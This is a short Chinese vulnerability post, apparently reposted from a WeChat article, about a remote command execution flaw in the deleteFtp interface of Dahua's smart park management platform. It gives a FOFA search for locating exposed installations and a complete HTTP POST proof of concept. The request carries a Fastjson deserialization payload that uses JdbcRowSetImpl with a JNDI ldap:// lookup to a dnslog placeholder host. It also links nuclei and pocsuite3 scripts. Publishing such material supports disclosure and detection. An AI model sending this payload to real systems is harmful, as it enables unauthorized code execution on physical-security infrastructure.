大华智慧园区综合管理平台是由大华技术股份有限公司(Dahua Technology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者提高管理效率、提升安全水平、优化资源利用,并实现智能化的园区运营。大华智慧园区综合管理平台采用模块化设计和开放式架构,可根据不同园区的需求进行定制和扩展。同时,它还支持云端部署和移动端访问,方便管理者随时随地监控园区运营情况。
大华智慧园区综合管理平台deleteFtp接口存在远程命令执行漏洞。
fofa查询
app="dahua-智慧园区综合管理平台"POC
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Connection: closeContent-Length: 195Content-Type: application/jsonAccept-Encoding: gzip, deflate, br{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true}}}
nuclei 漏洞检测
pocsuite3 漏洞检测
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498509&idx=1&sn=d2502a852a72786e8f2ce642bb681e44&chksm=974c5c35a03bd523333ed709ec5338045a2583823bd41dd636af5dbebb021c8655421c95759a&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh